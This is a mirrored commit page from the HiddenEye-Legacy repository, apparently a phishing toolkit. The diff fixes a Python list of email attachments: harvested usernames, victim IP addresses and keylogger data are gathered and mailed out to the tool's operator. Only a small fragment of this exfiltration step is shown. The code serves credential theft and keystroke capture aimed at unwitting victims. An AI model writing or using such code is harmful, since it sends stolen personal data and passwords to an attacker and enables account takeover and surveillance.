mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Minor Attachment Issue Fixed.
This commit is contained in:
parent
8e251cce1a
commit
2e164a6c36
|
@ -29,7 +29,7 @@ def main():
|
|||
outer.preamble = ''
|
||||
# List of attachments
|
||||
print('[.] Adding Attachments...')
|
||||
attachments = ['Defs/Send_Email/attachments/READ_IT.txt && Defs/Send_Email/attachments/ip.txt','Defs/Send_Email/attachments/usernames.txt','Defs/Send_Email/attachments/KeyloggerData.txt']
|
||||
attachments = ['Defs/Send_Email/attachments/READ_IT.txt','Defs/Send_Email/attachments/ip.txt','Defs/Send_Email/attachments/usernames.txt','Defs/Send_Email/attachments/KeyloggerData.txt']
|
||||
print('[.] Attachments Added.')
|
||||
# Add the attachments to the message
|
||||
for file in attachments:
|
||||
|
|
Loading…
Reference in New Issue
Block a user